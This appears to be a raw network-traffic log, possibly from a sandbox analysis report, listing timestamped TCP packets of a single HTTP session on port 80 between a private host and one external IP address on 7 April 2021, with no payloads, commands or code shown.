Apr 7, 2021 07:16:28.772169113 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772186041 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772254944 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772377968 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772397041 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772413015 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772449970 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772469044 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772516012 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772607088 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772648096 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772716999 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772762060 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772779942 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772797108 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772829056 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772917986 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772922039 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772984982 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772990942 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.773077965 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.927742958 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927783966 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927800894 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927822113 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927843094 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927860022 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927876949 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927881002 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.927895069 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927912951 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927932024 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.927932024 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.927953005 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928004026 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928050995 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928189039 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928200006 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928220987 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928237915 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928256035 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928273916 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928298950 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928316116 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928340912 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928368092 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928371906 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928383112 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928430080 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928448915 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928483009 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928502083 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928554058 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928586960 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928695917 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928733110 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928750038 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928755045 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928792000 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928816080 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928833008 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928838015 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928842068 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928857088 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928877115 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928889036 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928901911 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928927898 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928950071 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928957939 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.928963900 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.928994894 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929034948 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929120064 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929147959 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929178953 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929188013 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929225922 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929263115 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929461956 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929491997 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929512024 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929529905 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929536104 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929559946 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929560900 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929621935 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929640055 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929686069 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929693937 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929728031 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929737091 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929778099 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.929826975 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.929892063 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930099010 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930171013 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930247068 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930304050 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930330992 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930352926 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930375099 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930397034 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930418968 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930423975 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930439949 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930449963 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930470943 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930497885 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930599928 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930655956 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930847883 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930871964 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930893898 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.930917025 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930951118 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.930967093 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931018114 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931123018 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931175947 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931381941 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931405067 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931423903 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931442022 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931451082 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931466103 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931483984 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931510925 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931544065 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931560040 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931572914 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931619883 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931623936 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931646109 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931668043 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931675911 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931703091 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931730986 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931797028 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931859016 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.931960106 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.931993961 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932018042 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932018042 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932041883 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932054043 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932064056 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932085037 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932099104 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932141066 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932147980 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932178020 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932209015 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932271957 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932310104 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932327032 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932358027 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932526112 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932550907 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932588100 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932727098 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932745934 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932758093 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932780981 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932810068 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.932910919 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932934999 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932959080 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.932966948 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933002949 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933121920 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933192015 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933193922 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933234930 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933248997 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933250904 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933273077 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933291912 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933294058 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933320045 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933324099 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933358908 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933381081 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933382034 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933409929 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933448076 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933465004 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933506012 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933520079 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933799028 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933831930 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933855057 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933877945 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933881998 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933922052 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.933933020 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.933976889 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934007883 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934047937 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934053898 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934061050 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934068918 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934096098 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934123993 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934164047 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934192896 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934217930 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934222937 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934248924 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934269905 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934274912 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934300900 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934339046 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934534073 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934623003 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934703112 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934760094 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934762955 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934784889 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934811115 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934829950 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934839010 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934891939 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.934901953 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934912920 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.934966087 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935003042 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935060024 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935101986 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935127974 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935151100 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935158014 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935167074 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935180902 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935190916 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935219049 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935241938 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935271025 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935316086 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935364962 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935389996 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935400963 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935414076 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935461044 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935486078 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935504913 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935535908 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935573101 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935650110 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935673952 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935698986 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935734034 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935741901 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935765028 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935790062 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935802937 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.935821056 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.935858011 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936058044 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936072111 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936117887 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936145067 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936156988 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936206102 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936383009 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936412096 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936434984 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936532974 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936603069 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936657906 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936688900 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936741114 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936779022 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936794996 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.936830044 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.936857939 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937146902 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937192917 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937211037 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937254906 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937321901 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937367916 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937417030 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937427044 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937477112 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937530041 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937582016 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937684059 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937733889 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937798023 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937848091 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937849998 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937875986 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937903881 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937932968 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.937942982 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937978029 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.937999964 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.938007116 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.938038111 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.938047886 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.938064098 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.938091993 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.938992023 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.939063072 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.087845087 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.087887049 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.087910891 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.087935925 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.087959051 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.087990999 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088016033 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088028908 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088040113 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088066101 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088088989 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088105917 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088114023 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088143110 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088155031 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088171959 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088184118 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088196039 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088216066 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088221073 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088247061 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088255882 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088269949 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088279009 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088294029 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088303089 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088318110 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088329077 CEST	49715	80	192.168.2.6	192.232.249.186
